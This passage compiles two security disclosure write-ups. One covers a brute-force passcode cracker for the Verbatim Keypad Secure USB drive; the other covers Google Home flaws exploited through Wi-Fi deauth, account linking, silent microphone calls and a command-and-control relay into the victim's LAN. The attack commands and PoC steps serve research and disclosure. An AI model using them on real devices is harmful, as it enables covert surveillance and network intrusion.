00000070  6b a1 05 23 d3 0e 7b 61  d4 90 aa 33 26 6a 6c f9  |k..#..{a...3&jl.|
*
00000100  fe 82 1c 5e 9a 4b 16 81  f7 86 48 be d9 a5 a1 7b  |...^.K....H....{|
*
00000200

By further debugging the device firmware, it could be determined that the AES key for decrypting this special block is the 32 byte payload sent from the keyboard controller to the USB-to-SATA bridge controller INIC-3637EN described in the protocol analysis. However, the AES engine of the INIC-3637EN uses the AES key in a special byte order where the first 16 bytes and the last 16 bytes are reversed.

The following Python code illustrates how the actual AES key is generated from the 32 byte payload of the SPI command sent by the keyboard controller to the INIC-3637EN:

AES_key = reversed(passcode_key[0:16]) + reversed(passcode_key[16:32]) 

AS the information for the user authentication is stored in a special block on the SSD, and the AES key derivation from the user input (passcode) using the integer hash function hash32shift2002 is known, it is possible to perform an offline brute-force attack against the passcode-based user authentication of the Verbatim Keypad Secure. And because only 5 to 12 digit long passcodes are supported, the possible search space of valid passcodes is relatively small.

Therefore, the software tool 

Verbatim Keypad Secure Cracker
 was developed, which can find the correct passcode in order to gain unauthorized access to the encrypted user data of a Verbatim Keypad Secure USB flash drive.

The following output exemplarily illustrates a successful brute-force attack.

# ./vks-cracker /dev/sda
 █████   █████ █████   ████  █████████       █████████                               █████
░░███   ░░███ ░░███   ███░  ███░░░░░███     ███░░░░░███                             ░░███
 ░███    ░███  ░███  ███   ░███    ░░░     ███     ░░░  ████████   ██████    ██████  ░███ █████  ██████  ████████
 ░███    ░███  ░███████    ░░█████████    ░███         ░░███░░███ ░░░░░███  ███░░███ ░███░░███  ███░░███░░███░░███
 ░░███   ███   ░███░░███    ░░░░░░░░███   ░███          ░███ ░░░   ███████ ░███ ░░░  ░██████░  ░███████  ░███ ░░░
  ░░░█████░    ░███ ░░███   ███    ░███   ░░███     ███ ░███      ███░░███ ░███  ███ ░███░░███ ░███░░░   ░███
    ░░███      █████ ░░████░░█████████     ░░█████████  █████    ░░████████░░██████  ████ █████░░██████  █████
     ░░░      ░░░░░   ░░░░  ░░░░░░░░░       ░░░░░░░░░  ░░░░░      ░░░░░░░░  ░░░░░░  ░░░░ ░░░░░  ░░░░░░  ░░░░░
 ... finds out your passcode.

Verbatim Keypad Secure Cracker v0.5 by Matthias Deeg <matthias.deeg@syss.de> (c) 2022
---
[*] Found 4 CPU cores
[*] Reading magic sector from device /dev/sda
[*] Found a plausible magic sector for Verbatim Keypad Secure (#49428)
[*] Initialize passcode hash table
[*] Start cracking ...
[+] Success!
    The passcode is: 99999999

This found security vulnerability was reported in the course of our responsible disclosure program via the security advisory SYSS-2022-001 with the assigned CVE ID CVE-2022-28384.

You can also find a demonstration of this attack in our SySS PoC video Hacking a Secure USB Flash Drive.

Summary

In this article, the research results leading to four different security vulnerabilities concerning the Verbatim Keypad Secure USB flash drive listed in the following Table were presented.

ProductVulnerability TypeSySS IDCVE ID
Verbatim Keypad SecureUse of a Cryptographic Primitive with a Risky Implementation (CWE-1240)SYSS-2022-001CVE-2022-28384
Verbatim Keypad SecureUse of a Cryptographic Primitive with a Risky Implementation (CWE-1240)SYSS-2022-002CVE-2022-28382
Verbatim Keypad SecureMissing Immutable Root of Trust in Hardware (CWE-1326)SYSS-2022-003CVE-2022-28383
Verbatim Keypad SecureExpected Behavior Violation (CWE-440)SYSS-2022-004CVE-2022-28386

Those results show, that new portable storage devices with old security issues are still produced and sold.

In the next part of this blog series, research results concerning another secure USB flash drive are covered.

Turning Google smart speakers into wiretaps for $100k

Turning Google smart speakers into wiretaps for $100k

Original text by Matt Kunze

Summary

I was recently rewarded a total of $107,500 by Google for responsibly disclosing security issues in the Google Home smart speaker that allowed an attacker within wireless proximity to install a “backdoor” account on the device, enabling them to send commands to it remotely over the Internet, access its microphone feed, and make arbitrary HTTP requests within the victim’s LAN (which could potentially expose the Wi-Fi password or provide the attacker direct access to the victim’s other devices). These issues have since been fixed.

(Note: I tested everything on a Google Home Mini, but I assume that these attacks worked similarly on Google’s other smart speaker models.)

Investigation

I was messing with the Google Home and noticed how easy it was to add new users to the device from the Google Home app. I also noticed that linking your account to the device gives you a surprising amount of control over it.

Namely, the “routines” feature allows you to create shortcuts for running a series of other commands (e.g. a “good morning” routine that runs the commands “turn off the lights” and “tell me about the weather”). Through the Google Home app, routines can be configured to start automatically on your device on certain days at certain times. Effectively, routines allow anyone with an account linked to the device to send it commands remotely. In addition to remote control over the device, a linked account also allows you to install “actions” (tiny applications) onto it.

When I realized how much access a linked account gives you, I decided to investigate the linking process and determine how easy it would be to link an account from an attacker’s perspective.

So… how would one go about doing that? There are a bunch of different routes to explore when reverse engineering an IoT device, including (but not limited to):

  1. Obtaining the device’s firmware by dumping it or downloading it from the vendor’s website
  2. Static analysis of the app that interfaces with the device (in this case, the “Google Home” Android app), e.g. using Apktool or JADX to decompile it
  3. Dynamic analysis of the app during runtime, e.g. using Frida to hook Java methods and print info about internal state
  4. Intercepting the communications between the app and the device (or between the app/device and the vendor’s servers) using a “man-in-the-middle” (MITM) attack

Obtaining firmware is particularly difficult in the case of Google Home because there are no debugging/flashing pins on the device’s PCB so the only way to read the flash is to desolder the NAND chip. Google also does not publicly provide firmware image downloads. As shown at DEFCON though, it is possible.

However, in general, when reverse engineering things, I like to start with a MITM attack if possible, since it’s usually the most straightforward path to gaining some insight into how the thing works. Typically IoT devices use standard protocols like HTTP or Bluetooth for communicating with their corresponding apps. HTTP in particular can be easily snooped using tools like mitmproxy. I love mitmproxy because it’s FOSS, has a nice terminal-based UI, and provides an easy-to-use Python API.

Since the Google Home doesn’t have its own display or user interface, most of its settings are controlled through the Google Home app. A little Googling revealed that some people had already begun to document the local HTTP API that the device exposes for the Google Home app to use. Google Cast devices (including Google Homes and Chromecasts) advertise themselves on the LAN using mDNS, so we can use 

dns-sd
 to discover them:

$ dns-sd -B _googlecast._tcp
Browsing for _googlecast._tcp
DATE: ---Fri 05 Aug 2022---
15:30:15.526  ...STARTING...
Timestamp     A/R    Flags  if Domain               Service Type         Instance Name
15:30:15.527  Add        3   6 local.               _googlecast._tcp.    Chromecast-997113e3cc9fce38d8284cee20de6435
15:30:15.527  Add        3   6 local.               _googlecast._tcp.    Google-Nest-Hub-d5d194c9b7a0255571045cbf615f7ffb
15:30:15.527  Add        3   6 local.               _googlecast._tcp.    Google-Home-Mini-f09088353752a2e56bddbb2a27ec377

We can use 

nmap
 to find the port that the local HTTP API is running on:

$ nmap 192.168.86.29
Starting Nmap 7.91 ( https://nmap.org ) at 2022-08-05 15:41
Nmap scan report for google-home-mini.lan (192.168.86.29)
Host is up (0.0075s latency).
Not shown: 995 closed ports
PORT      STATE SERVICE
8008/tcp  open  http
8009/tcp  open  ajp13
8443/tcp  open  https-alt
9000/tcp  open  cslistener
10001/tcp open  scp-config

We see HTTP servers on port 8008 and 8443. According to the unofficial documentation I linked above, 8008 is deprecated and only 8443 works now. (The other ports are for Chromecast functionality, and some unofficial documentation for those is available elsewhere on the Internet.) Let’s try issuing a request:

$ curl -s --insecure https://192.168.86.29:8443/setup/eureka_info?params=settings
{"settings":{"closed_caption":{},"control_notifications":1,"country_code":"US","locale":"en-US","network_standby":0,"system_sound_effects":true,"time_format":1,"timezone":"America/Chicago","wake_on_cast":1}}

(We use 

--insecure
 because the device sends a self-signed certificate, which the Google Home app is configured to trust, but my computer is not.)

Ok, we got the device’s settings. However, the docs say that most API endpoints require a 

cast-local-authorization-token
. Let’s try something more interesting, rebooting the device:

$ curl -i --insecure -X POST -H 'Content-Type: application/json' -d '{"params":"now"}' https://192.168.86.29:8443/setup/reboot
HTTP/1.1 401 Unauthorized
Access-Control-Allow-Headers:Content-Type
Cache-Control:no-cache
Content-Length:0

Indeed, it’s rejecting the request because we’re not authorized. So how do we get the token? Well, the docs say that you can either extract it from the Google Home app’s private app data directory (if your phone is rooted), or you can use a script that takes your Google username and password as input, calls the API that the Google Home app internally uses to get the token, and returns the token. Both of these methods require that you have an account that’s already been linked to the device, though, and I wanted to figure out how the linking happens in the first place. Presumably, this token is being used to prevent an attacker (or malicious app) on the LAN from accessing the device. Therefore, it surely takes more than just basic LAN access to link an account and get the token, right…? I searched the docs but there was no mention of account linking. So I proceeded to investigate the matter myself.

Setting up the proxy

Intercepting unencrypted HTTP traffic with mitmproxy on Android is as simple as starting the proxy server then configuring your phone (or just the target app) to route all of its traffic through the proxy. However, the unofficial local API documentation said that Google had recently started using HTTPS. Also, I wanted to be able to intercept not only the traffic between the app and the Google Home device, but also between the app and Google’s servers (which is definitely HTTPS). I thought that since the linking process involved Google accounts, parts of the process might happen on the Google server, rather than on the device.

Intercepting HTTPS traffic on Android is a little trickier, but usually not terribly difficult. In addition to configuring the proxy settings, you also need to make the app trust mitmproxy’s root CA certificate. You can install new CAs through Android Settings, but annoyingly as of Android 7 apps using the system-provided networking APIs will no longer automatically trust user-added CAs. If you have a rooted Android phone, you can modify the system CA store directly (located at 

/system/etc/security/cacerts
). Alternatively, you could manually patch the individual app. However, sometimes even that isn’t enough as some apps employ “SSL pinning” to ensure that the certificate used for SSL matches the one they were expecting. If the app uses the system-provided pinning APIs (
javax.net.ssl
) or uses a popular HTTP library (e.g. OkHttp), it’s not hard to bypass; just hook the relevant methods with Frida or Xposed. While Xposed and the full version of Frida both require root, Frida Gadget can be used without root. If the app is using a custom pinning mechanism, you’ll have to reverse engineer it and manually patch it out.

Patching and repacking the Google Home app isn’t an option because it uses Google Play Services OAuth APIs (which means the APK needs to be signed by Google or it’ll crash), so root access is necessary to intercept its traffic. Since I didn’t want to root my primary phone, and emulators tend to be clunky, I decided to use an old spare phone I had lying around. I rooted it using Magisk and modified the system CA store to include mitmproxy’s CA, but this wasn’t sufficient as the Google Home app appeared to be utilizing SSL pinning. To bypass the pinning, I used a Frida script I found on GitHub.

I could now see all of the encrypted traffic showing up in mitmproxy:

Even the traffic between the app and device was being captured. Cool!

Alright, so let’s observe what happens when a new user links their account to the device. I already had my primary Google account linked, so I created a new account as the “attacker”. When I opened the Google Home app and signed in under the new account (making sure I was connected to the same Wi-Fi network as the device), the device showed up under “Other devices”, and when I tapped on it, I was greeted with this screen:

I pressed the button and it prompted me to install the Google Search app to continue. I guess the Voice Match setup is done through that app instead. But as an attacker I don’t care about adding my voice to the device; I only want to link my account. So is it possible to link an account without Voice Match? I thought that it must be, since the initial device setup was done entirely within the Home app, and I wasn’t required to enable Voice Match on my primary account. I was about to perform a factory reset and observe the initial account link, but then I realized something.

Much of the internal architecture of Google Home is shared with Chromecast devices. According to a DEFCON talk, Google Home devices use the same operating system as Chromecasts (a version of Linux). The local API seems to be the similar, too. In fact, the Home app’s package name ends with 

chromecast.app
, and it used to just be called “Chromecast”. Back then, its only function was to set up Chromecast devices. Now it’s responsible for setting up and managing not just Chromecasts, but all of Google’s smart home devices.

Anyway, why not just try observing how the Chromecast link process works, then try to replicate it for use with the Google Home? It’s bound to be simpler, because Chromecasts don’t support Voice Match (nor the Google Assistant, for that matter). Luckily, I also had a few Chromecasts lying around. I plugged in one and found it within the Home app:

All I had to do was tap the “Enable voice control and more” banner and confirm, and then my account was linked! Ok, let’s see what happened on the network side:

We see a POST request to a 

/deviceuserlinksbatch
 endpoint on 
clients3.google.com
:

It’s a binary payload, but we can immediately see that it contains some device details (e.g. the device’s name, “Office TV”). We see that the 

content-type
 is 
application/protobuf
Protocol Buffers is Google’s binary data serialization format. Like JSON, data is stored in pairs of keys and values. The client and server exchanging protobuf data both have a copy of the 
.proto
 file, which defines the field names and data types (e.g. 
uint32
bool
string
, etc). During the encoding process, this data is stripped out, and all that remains are the field numbers and wire types. Fortunately, the wire types translate pretty directly back to the original data types (there are usually only a few possibilities as to what the original data type could have been based on the wire type). Google provides a command-line tool called 
protoc
 that allows us to encode and decode protobuf data. The 
--decode_raw
 option tells 
protoc
 to decode without the 
.proto
 file by guessing what the data types are. This raw decoding is usually enough to understand the data structure, but if it doesn’t look right, you could create your own 
.proto
 with your data type guesses, try to decode, and if it still doesn’t make sense, keep adjusting the 
.proto
 until it does.

In our case, 

--decode_raw
 produces a perfectly readable output:

$ protoc --decode_raw < deviceuserlinksbatch
1 {
  1: "590C[...]"
  2: "MIIDojCCAoqgAwIBAgIEVcQZjzANBgkqhkiG9w0BAQUFADB5MQswCQYDVQQGEwJVUzETMBEGA1UECAwKQ2FsaWZvcm5pYTEWMBQGA1UEBwwNTW91bnRhaW4gVmlldzETMBEGA1UECgwKR29vZ2xlIEluYzENMAsGA1UECwwEQ2FzdDEZMBcGA1UEAwwQQ2hyb21lY2FzdCBJQ0EgMzAeFw0xNTA4MDcwMjM1NTlaFw0zNTA4MDIwMjM1NTlaMHwxEzARBgNVBAoMCkdvb2dsZSBJbmMxDTALBgNVBAsMBENhc3QxFjAUBgNVBAcMDU1vdW50YWluIFZpZXcxCzAJBgNVBAYTAlVTMRMwEQYDVQQIDApDYWxpZm9ybmlhMRwwGgYDVQQDDBMzVzM3OTkgRkE4RkNBMzJDRjBEMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAleog/oEXK6PKyGHDIYcDwT2Xl8GLOFuhxQh/K+dTahxex9+4mLAXx5v2s75Iwv9jcXEpD5NTvjNXx20B0/rfpYORHbcm3UEwFWGnP5uvKIyLar+rC7Az5ZPzPXMx7xX6Br68/gOXMGJd17OG/m0rduBZNjmasBb7+Zu8jS38cv+N3S7yTobJbagrHxIufa7gX+rO2f3/jF2EutgcA4lIm5r/2J34fkYTMXnxElJCUv/b1COuk0FZTei4mooJ+TvcQE2ljgHOSvzGnZuT+QWch8TyRjIjKuIK4dB1UIcSvmQoq9PTbfzWCTcW1fREdPtnta6pyWIzmoJ9+3AhVnWAhwIDAQABoy8wLTAJBgNVHRMEAjAAMAsGA1UdDwQEAwIHgDATBgNVHSUEDDAKBggrBgEFBQcDAjANBgkqhkiG9w0BAQUFAAOCAQEAv11SILN9BfcUthEFq/0NJYnNIFoza21T1BR9qYymFKtUGOplFav00drHziTzUUCNUzbLGnR/yKXxXYlgUOlscEIHxN0+11tvWslHQk7Xgz2RUerBXy9l+vSwp87F8YVECny8lMFZi0T6hHUvtuM6O9qovQKS6ORx3GmZKlNOsNspPnF8IVpN+KtIiopL6vf84iCpbx+dQoOfUOZsbZ+XSxwT34yeNFXqdAIFwP1maMmPZZYnQrDYyUdyowYzk48fDG2QDhFf7dLjtCngcQ83MWWU5nx9On67hnj2VeFGKWsner4cwjs0+iVafUGiWD0tZejVXHSrR7TBouqOf9eG6Q=="
  6: "Office TV"
  7: "b"
  8: 0
  9 {
    1: 1
    2: 0
  }
  10: 2
  12: 0
}

Looks like the link request payload mainly consists of three things: device name, certificate, and “cloud ID”. I quickly recognized these values from the earlier 

/setup/eureka_info
 local API requests. So it appears that the link process is:

  1. Get the device’s info through its local API
  2. Send a link request to the Google server along with this info

I wanted to use mitmproxy to re-issue a modified version of the request, replacing my Chromecast’s info with the Google Home’s info. I would eventually want to create a 

.proto
 file so I could use 
protoc --encode
 to create link requests from scratch, but at that point I just wanted to quickly test to see if it would work. I figured I could replace any strings in the binary payload without causing any problems as long as they were the same length. The cloud ID and cert were the same lengths, but the name (“Office speaker”) was not, so I renamed the device in the Home app to make it that way. Then I issued the modified request, and it appeared to work. The Google Home’s settings were unlocked in the Home app. Behind the scenes, I saw in mitmproxy that the device’s local auth token was being sent along with local API requests.

Python re-implementation

The next thing I wanted to do is re-implement the link process with a Python script so I didn’t have to bother with the Home app any more.

To get the required device info, we just need to issue a request like:

GET https://[Google Home IP]:8443/setup/eureka_info?params=name,device_info,sign

Re-implementing the actual link request was a tad harder. First I examined the script mentioned by the unofficial local API docs that calls Google’s cloud APIs. It uses a library called gpsoauth which implements Android’s Google login flow in Python. Basically, it turns your Google username and password into OAuth tokens, which can be used to call undocumented Google APIs. It’s being used by some unofficial Python clients for Google services, like gkeepapi for Google Keep.

I used mitmproxy and gpsoauth to figure out and re-implement the link request. It looks like this:

POST https://clients3.google.com/cast/orchestration/deviceuserlinksbatch?rt=b

Authorization: Bearer [token from gpsoauth]
[...some uninteresting headers added by the Home app...]
Content-Type: application/protobuf

[device info protobuf payload, described earlier]

To create the protobuf payload, I made a simple 

.proto
 file for the link request so I could use 
protoc --encode
. I gave the fields I knew descriptive names (e.g. 
device_name
), and the unknown fields generic names:

syntax = "proto2";

message LinkDevicePayload {
    message Payload {
        message Data {
            required uint32 i1 = 1;
            required uint32 i2 = 2;
        }
        required string device_id = 1;
        required string device_cert = 2;
        required string device_name = 6;
        required string s7 = 7;
        required uint32 i8 = 8;
        required Data d = 9;
        required uint32 i10 = 10;
        required uint32 i12 = 12;
    }
    required Payload p = 1;
}

As a basic smoke test, I used this 

.proto
 to encode a message with the same values as the message I captured from the Home app, and made sure that the binary output was the same.

Putting it all together, I had a Python script that takes your Google credentials and an IP address as input and uses them to link your account to the Google Home device at the provided IP.

Further investigation

Now that I had my Python script, it was time to think from the perspective of an attacker. Just how much control over the device does a linked account gives you, and what are some potential attack scenarios? I first targeted the routines feature, which allows you to execute voice commands on the device remotely. Doing some more research into previous attacks on Google Home devices, I encountered the “Light Commands” attack, which provided some inspiration for coming up with commands that an attacker might use:

  • Control smart home switches
  • Open smart garage doors
  • Make online purchases
  • Remotely unlock and start certain vehicles
  • Open smart locks by stealthily brute forcing the user’s PIN number

I wanted to go further though and come up with an attack that would work on all Google Home devices, regardless of how many other smart devices that the user has. I was trying to come up with a way to use a voice command to activate the microphone and exfiltrate the data. Perhaps I could use voice commands to load an application onto the device which opens the microphone? Looking at the “conversational actions” docs, it seemed possible to create an app for the Google Home and then invoke it on a linked device using the command “talk to my test app”. But these “apps” can’t really do much. They don’t have access to the raw audio from the microphone; they only get a transcription of what the user says. They don’t even run on the device itself. Rather, the Google servers talk to your app via webhooks on the device’s behalf. The “smart home actions” seemed more interesting, but that’s something I explored later.

All of a sudden it hit me: these devices support a “call [phone number]” command. You could effectively use this command to tell the device to start sending data from its microphone feed to some arbitrary phone number.

Creating malicious routines

The interface for creating a routine within the Google Home app looks like this:

With the help of mitmproxy, I learned that this is actually just a WebView that embeds the website 

https://assistant.google.com/settings/routines
, which loads fine in a normal web browser (as long as you’re logged in to a Google account). This made reverse engineering it a little easier.

I created a routine to execute the command “call [my phone number]” on Wednesdays at 8:26 PM (it was currently a Wednesday, at 8:25 PM). For routines that run automatically at certain times, you need to specify a “device for audio” (a device to run the routine on). You can choose from a list of devices linked to your account:

A minute later, the routine executed on my Google Home, and it called my phone. I picked up the phone and listened to myself talking through the Google Home’s microphone. Pretty cool!

(Later through inspecting network requests, I found that you can specify not only the hour and minute to activate the routine at, but also the precise second, which meant I only had to wait a few seconds for my routines to activate, rather than about a minute.)

An attack scenario

I had a feeling that Google didn’t intend to make it so easy to access the microphone feed on the Google Home remotely. I quickly thought of an attack scenario:

Attacker wishes to spy on victim.

  1. Victim installs attacker’s malicious Android app.
  2. App detects a Google Home on the network via mDNS.
  3. App uses the basic LAN access it’s automatically granted to silently issue the two HTTP requests necessary to link the attacker’s account to the victim’s device (no special permissions necessary).

Attacker can now spy on the victim through their Google Home.

This still requires social engineering and user interaction, though, which isn’t ideal from an attacker’s perspective. Can we make it cooler?

From a more abstract point of view, the combined device information (name, cert, and cloud ID) basically acts as a “password” that grants remote control of the device. The device exposes this password over the LAN through the local API. Are there other ways for an attacker to access the local API?

In 2019, “CastHack” made the news, as it was discovered that thousands of Google Cast devices (including Google Homes) were exposed to the public Internet. At first it was believed that the issue was these devices’ use of UPnP to automatically open ports on the router related to casting (8008, 8009, and 8443). However, it appears that UPnP is only used by Cast devices for local discovery, not for port forwarding, so the likely cause was a widespread networking misconfiguration (that might be related to UPnP somehow).

The people behind CastHack didn’t realize the true level of access that the local API provides (if combined with cloud APIs):

What can hackers do with this?

Remotely play media on your device, rename your device, factory reset or reboot the device, force it to forget all wifi networks, force it to pair to a new bluetooth speaker/wifi point, and so on.

(These are all local API endpoints, documented by the community already. This was also before the local API started requiring an auth token.)

What CAN’T hackers do with this?

Assuming the Chromecast/Google Home is the only problem you have, hackers CANNOT access other devices on the network or sniff information besides WIFI points and Bluetooth devices. They also don’t have access to your personal Google account, nor the Google Home’s microphone.

There are services like Shodan that allow you to scan the Internet for open ports and vulnerable devices. I was able to find hundreds of Cast devices with port 8443 (local API) publicly exposed using some simple search queries. I didn’t pursue this for very long though, because ultimately bad router configuration is not something Google can fix.

While I was reading about CastHack, however, I encountered articles all the way back from 2014 (!) about the “RickMote”, a PoC contraption developed by Dan Petro, security researcher at Bishop Fox, that hijacks nearby Chromecasts and plays “Never Gonna Give You Up” on YouTube. Petro discovered that, when a Chromecast loses its Internet connection, it enters a “setup mode” and creates its own open Wi-Fi network. The intended purpose is to allow the device’s owner to connect to this network from the Google Home app and reset the Wi-Fi settings (in the event that the password was changed, for example). The “RickMote” takes advantage of this behavior.

It turns out that it’s usually really easy to force nearby devices to disconnect from their Wi-Fi network: just send a bunch of “deauth” packets to the target device. WPA2 provides strong encryption for data frames (as long as you choose a good password). However, “management” frames, like deauthentication frames (which tell clients to disconnect) are not encrypted. 802.11w and WPA3 support encrypted management frames, but the Google Home Mini doesn’t support either of these. (Even if it did, the router would need to support them as well for it to work, and this is rare among consumer home routers at this time due to potential compatibility issues. And finally, even if both the device and router supported them, there are still other methods for an attacker to disrupt your Wi-Fi. Basic channel jamming is always an option, though this requires specialized, illegal hardware. Ultimately, Wi-Fi is a poor choice for devices that must be connected to the Internet at all times.)

I wanted to check if this “setup mode” behavior was still in use on the Google Home. I installed 

aircrack-ng
 and used the following command to launch a deauth attack:

aireplay-ng --deauth 0 -a [router BSSID] -c [device MAC address] [interface]

My Google Home immediately disconnected from the network and then made its own:

I connected to the network and used 

netstat
 to get the router’s IP (the router being the Google Home), and saw that it assigned itself the IP 
192.168.255.249
. I issued a local API request to see if it would work:

$ curl -s --insecure https://192.168.255.249:8443/setup/eureka_info?params=name,device_info,sign | python3 -m json.tool
{
    "device_info": {
        [...]
        "cloud_device_id": "590C[...]",
        [...]
    },
    "name": "Office speaker",
    "sign": {
        "certificate": "-----BEGIN CERTIFICATE-----\nMIID[...]\n-----END CERTIFICATE-----\n",
        [...]
    }
}

I was shocked to see that it did! With this information, it’s possible to link an account to the device and remotely control it.

A cooler attack scenario

Attacker wishes to spy on victim. Attacker can get within wireless proximity of the Google Home (but does NOT have the victim’s Wi-Fi password).

  1. Attacker discovers victim’s Google Home by listening for MAC addresses with prefixes associated with Google Inc. (e.g. 
    E4:F0:42
    ).
  2. Attacker sends deauth packets to disconnect the device from its network and make it enter setup mode.
  3. Attacker connects to the device’s setup network and requests its device info.
  4. Attacker connects to the Internet and uses the obtained device info to link their account to the victim’s device.

Attacker can now spy on the victim through their Google Home over the Internet (no need to be within proximity of the device anymore).

What else can we do?

Clearly a linked account gives a tremendous amount of control over the device. I wanted to see if there was anything else an attacker could do. We were now accounting for attackers that aren’t already on the victim’s network. Would it be possible to interact with (and potentially attack) the victim’s other devices through the compromised Google Home? We already know that with a linked account you can:

  • Get the local auth token and change device settings through the local API
  • Execute commands on the device remotely through “routines”
  • Install “actions”, which are like sandboxed applications

Earlier I looked into “conversational actions” and determined that these are too sandboxed to be useful as an attacker. But there is another type of action: “smart home actions”. Device manufacturers (e.g. Philips) can use these to add support for their devices to the Google Home platform (e.g. when the user says “turn on the lights”, their Philips Hue light bulbs will receive a “turn on” command).

One thing I found particularly interesting while reading the documentation was the “Local Home SDK”. Smart home actions used to only run through the Internet (like conversational actions), but Google had recently (April 2020) introduced support for running these locally, improving latency.

The SDK lets you write a local fulfillment app, using TypeScript or JavaScript, that contains your smart home business logic. Google Home or Google Nest devices can load and run your app on-device. Your app communicates directly with your existing smart devices over Wi-Fi on a local area network (LAN) to fulfill user commands, over existing protocols.

Sounded promising. I looked into how it works though and it turns out that these local home apps don’t have direct LAN access. You can’t just connect to any IP you want; rather, you need to specify a “scan configuration” using mDNS, UPnP or UDP broadcast. The Google Home scans the network on your behalf, and if any matching devices are found, it will return a JavaScript object that allows your app to interact with the device over TCP/UDP/HTTP.

Is there any way around this? I noticed that the docs said something about debugging using Chrome DevTools. It turns out that when a local home app is running in testing mode (deployed to the developer’s own account), the Google Home opens port 9222 for the Chrome DevTools Protocol (CDP). CDP access provides complete control over the Chrome instance. For example, you can open or close tabs, and intercept network requests. That got me thinking, maybe I could provide a scan configuration that instructs the Google Home to scan for itself, so I would be able to connect to CDP, take control of the Chrome instance running on the device, and use it to make arbitrary requests within the LAN.

I created a local home app using my linked account and set up the scan config to search for the 

_googlecast._tcp.local
 mDNS service. I rebooted the device, and the app loaded automatically. It quickly found itself and I was able to issue HTTP requests to 
localhost
!

CDP uses WebSockets, which can be accessed through the standard JS API. The same-origin policy doesn’t apply to WebSockets, so we can easily initiate a WebSocket to 

localhost
 from our local home app (hosted on some public website) without any problems, as long as we have the correct URL. Because CDP access could lead to trivial RCE on the desktop version of Chrome, the WebSocket address is randomly generated each time debugging is enabled, to prevent random websites from connecting. The address can be retrieved through a GET request to 
http://[CDP host]:9222/json
. This is normally protected by the same-origin policy, so we can’t just use an XHR request, but since we have full access to 
localhost
 through the Local Home SDK, we can use that to make the request. Once we have the address, we can use the JS 
WebSocket()
 constructor to connect.

Through CDP, we can send arbitrary HTTP requests within the victim’s LAN, which opens up the victim’s other devices for attack. As I describe later, I also found a way to read and write arbitrary files on the device using CDP.

PoCs

The following PoCs have been published here: https://github.com/DownrightNifty/gh_hack_PoC

Since the security issues have been fixed, none of these probably work anymore, but I thought they were worth documenting/preserving.

PoC #1: Spy on victim

I made a PoC that works on my Android phone (via Python on Termux) to demonstrate how quick and easy the process of linking an account could be. The attack described here could be performed within the span of a few minutes.

For the PoC, I re-implemented the device link and routines APIs in Python, and made the following utilities: 

google_login.py
link_device.py
reset_volume.py
call_device.py
.

  1. Download protoc and add it to your PATH
  2. Install the requirements: 
    pip3 install requests==2.23.0 gpsoauth httpx[http2]
  3. Create the “attacker” Google account
  4. Log in with 
    python3 google_login.py
  5. Get within wireless proximity of Google Home
  6. Deauth the Google Home
    • Raw packet injection (required for deauth attacks) requires a rooted phone and won’t work on some Wi-Fi chips. I ended up using a NodeMCU, a tiny Wi-Fi development board, going for less than $5 on Amazon, and flashed it with spacehuhn’s deauther firmware. You can use its web UI to scan for nearby devices and deauth them. It quickly found my Google Home (manufacturer listed as “Google” based on MAC address prefix) and I was able to deauth it.
  7. Connect to the Google Home’s setup network (named 
    [device name].o
    )
  8. Run 
    python3 link_device.py --setup_mode 192.168.255.249
     to link your account to the device
    • In addition to linking your account, to make the attack as stealthy as possible, “night mode” is also enabled on the device, which decreases the maximum volume and LED brightness. Since music volume is unaffected, and the volume decrease is almost entirely suppressed when the volume is greater than 50%, this subtle change is unlikely to be noticed by the victim. However, it makes it so that, at 0% volume, the Assistant voice is completely muted (whereas with night mode off, it can barely still be heard at 0%).
  9. Stop the deauth attack and wait for the device to re-connect to the Internet
    • You can run 
      python3 reset_volume.py 4
       to reset the volume to 40% (since enabling night mode set it to 0%).
  10. Now that your account is linked, you can make the device call your phone number, silently, at any time, over the Internet, allowing you to listen in to the microphone feed.
    • To issue a call, run 
      python3 call_device.py [phone number]
      .
    • The commands “set the volume to 0” and “call [number]” are executed on the device remotely using a routine.
    • The only thing the victim may notice is that the device’s LEDs turn solid blue, but they’d probably just assume it’s updating the firmware or something. In fact, the official support page describing what the LED colors meanonly says solid blue means “Your speaker needs to be verified by you” and makes no mention of calling. During a call, the LEDs do not pulse like they normally do when the device is listening, so there is no indication that the microphone is open.

Here’s a video demonstrating what it looks like when a call is initiated remotely:

As you can see, there is no audible indication that the commands are running, which makes it difficult for the victim to notice. The victim can still use their device normally for the most part (although certain commands, like music playback, don’t work during a call).

PoC #2: Make arbitrary HTTP requests on victim’s network

As I described earlier, the attacker can install a smart home action onto the linked device remotely, and leverage the Local Home SDK to make arbitrary HTTP requests within the victim’s LAN. 

c2.py
 is the command & control server. 
app.js
 and 
index.html
 are the local home app.

  1. Configure and start the C&C server:
    • Install the requirements: 
      pip3 install mitmproxy websockets
    • Start the server: 
      mitmdump --listen-port 8000 --set upstream_cert=false --ssl-insecure -s c2.py
      • Under the default configuration, a proxy server starts on 
        localhost:8000
        , and a WebSocket server starts on 
        0.0.0.0:9000
        . The proxy server acts as a relay, sending requests from programs on your computer (like 
        curl
        ) to the victim’s Google Home through the WebSocket. In a real attack, the WebSocket port would need to be exposed to the Internet so the victim’s Google Home could connect to it, but for local demonstration, it doesn’t have to be.
  2. Configure the local home app:
    • Change the 
      C2_WS_URL
       variable at the top of 
      app.js
       to the WebSocket URL for your C&C server. This needs to be reachable by the Google Home.
    • Host the static 
      index.html
       and 
      app.js
       files somewhere reachable by the Google Home. For local demonstration, you can spin up a simple file hosting server using 
      python3 -m http.server
      .
  3. Deploy the local home app to your account:
npm run firebase --prefix functions/ -- functions:config:set \
    strand1.leds=16 strand1.channel=1 \
    strand1.control_protocol=HTTP
npm run deploy --prefix functions/
    • This tells the cloud fulfillment to include an 
      otherDeviceIds
       field in responses to 
      SYNC
       requests. As far as I understand, this is all that’s required to activate local fulfillment; the specific device IDs or attributes you choose don’t matter.
  1. Get within wireless proximity of the victim’s Google Home, then force it into setup mode, and link your account using the  
    link_device.py
     script from PoC #1.
  2. Reboot the device:
    • While still connected to the device’s setup network, send a POST request to the 
      /reboot
       endpoint with the body 
      {"params":"now"}
       and a 
      cast-local-authorization-token
       header (obtained with 
      HomeGraphAPI.get_local_auth_tokens()
       from 
      googleapi.py
      ).
    • For local demonstration, you can just unplug the Google Home then plug it back in.
  3. Not long after the reboot, the Google Home automatically downloads your local home app and runs it.
    • The app waits for the 
      IDENTIFY
